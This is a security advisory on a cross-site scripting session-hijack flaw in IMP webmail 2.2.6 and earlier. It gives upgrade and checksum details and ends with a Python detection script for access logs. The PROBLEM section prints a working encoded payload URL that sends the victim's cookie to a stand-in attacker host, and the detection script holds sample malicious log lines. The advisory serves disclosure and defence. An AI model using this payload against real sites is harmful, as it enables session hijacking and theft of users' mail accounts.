COMMAND

IMP

SYSTEMS AFFECTED

IMP 2.2.6 and lower
Not vulnerable: 2.2.7, dev versions 2.3 and 3.0

PROBLEM

João Pedro Gonçalves found that it's possible to hijack an IMP webmail session using a cross-site scripting attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper (http://alive.znep.com/~marcs/passport/).

To exploit this vulnerability using a text message, the attacker sends an email containing a URL. If the user clicks it, the browser is redirected to:

http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.com%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%20%27%3E%27)%3B%3C%2Fscript%3E%0A

which in turn redirects the user's browser to the attacker's server, where he captures the cookies that the browser used in the context of the webmail site, and with them the session.

SOLUTION

Upgrade to 2.2.7. Packages can be found at:

ftp://ftp.horde.org/pub/horde/
ftp://ftp.horde.org/pub/imp/

MD5 checksums:

2433ed0e67739c41021b1a9397130a96  horde-1.2.7.tar.gz
b5c683e1dc862fd185c9be0ce7188894  imp-2.2.7.tar.gz
818199bc9a92cff07d109c4b43a22ffe  patch-horde-1.2.6-1.2.7.gz
556ddcabc72048ae53f4cfb00680e6f5  patch-imp-2.2.6-2.2.7.gz
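
A detection sketch for the request pattern described under PROBLEM (an added example, not part of the original advisory or of the IMP code): it scans web-server access logs for status.php3 requests whose message parameter decodes to markup or cookie access. The Common Log Format input, the sample lines, and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); not from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Nov/2001:10:00:01 +0000] "GET /status.php3?message=Message+sent HTTP/1.0" 200 512
192.0.2.11 - - [10/Nov/2001:10:02:13 +0000] "GET /status.php3?message=%3Cscript%20language%3Djavascript%3Edocument.write(document.cookie)%3C%2Fscript%3E HTTP/1.0" 200 734
192.0.2.12 - - [10/Nov/2001:10:05:40 +0000] "GET /status.php3?message=%253Cimg%2520src%253Dx%253E HTTP/1.0" 200 640
192.0.2.13 - - [10/Nov/2001:10:06:02 +0000] "GET /mailbox.php3?page=2 HTTP/1.0" 200 9120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup or script access that has no place in a plain status message.
SUSPICIOUS_RE = re.compile(r"<\s*/?\s*[a-z!]|document\.cookie|javascript:", re.I)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text, script="status.php3", param="message"):
    """Return (client_ip, decoded_value) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs performs the first round of percent-decoding.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            decoded = fully_decode(value)
            if SUSPICIOUS_RE.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: {value}")
```

A hit means a user's browser requested such a link, so the session cookie issued to that client should be treated as exposed and invalidated.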